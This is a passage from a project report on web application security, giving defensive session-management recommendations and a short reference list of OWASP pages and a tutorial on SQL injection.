other request parameters. High value applications SHOULD force users to re-authenticate before viewing high-

value resources or complete high-value transactions. Session tokens should be regenerated prior to any significant high value transaction. In high-value applications, session tokens should be regenerated after a certain number of

requests. In high-value applications, session tokens should be regenerated after a certain period of

time. For all applications, session tokens should be regenerated after a change in user privilege. Applications should log attempts to continue sessions based on invalid session identifiers. Applications should, if possible, conduct all traffic over HTTPS. If applications use both HTTP and HTTPS, they MUST regenerate the identifier or use

an additional session identifier for HTTPS communications.

31

Page 33: Final Report Noby

Things Not To Do

Applications should NOT use as variables any user personal information (user name, password, home address, etc.).

Highly protected applications should not implement mechanisms that make automated requests to prevent session timeouts.

Highly protected applications should not implement "remember me" functionality. Highly protected applications should not use URL rewriting to maintain state when

cookies are turned off on the client. Applications should NOT use session identifiers for encrypted HTTPS transport that have

once been used over HTTP.

32

Page 34: Final Report Noby

References

1. https://www.owasp.org/index.php/SQL_Injection2. http://zerofreak.blogspot.in/2012/03/tutorial-by-

zer0freak-difficulty-easy.html3. https://www.owasp.org/index.php/

Testing_for_SQL_Injection_(OWASP-DV-005)#Boolean_Exploitation_Technique

4. https://www.owasp.org/index.php/Blind_SQL_Injection

33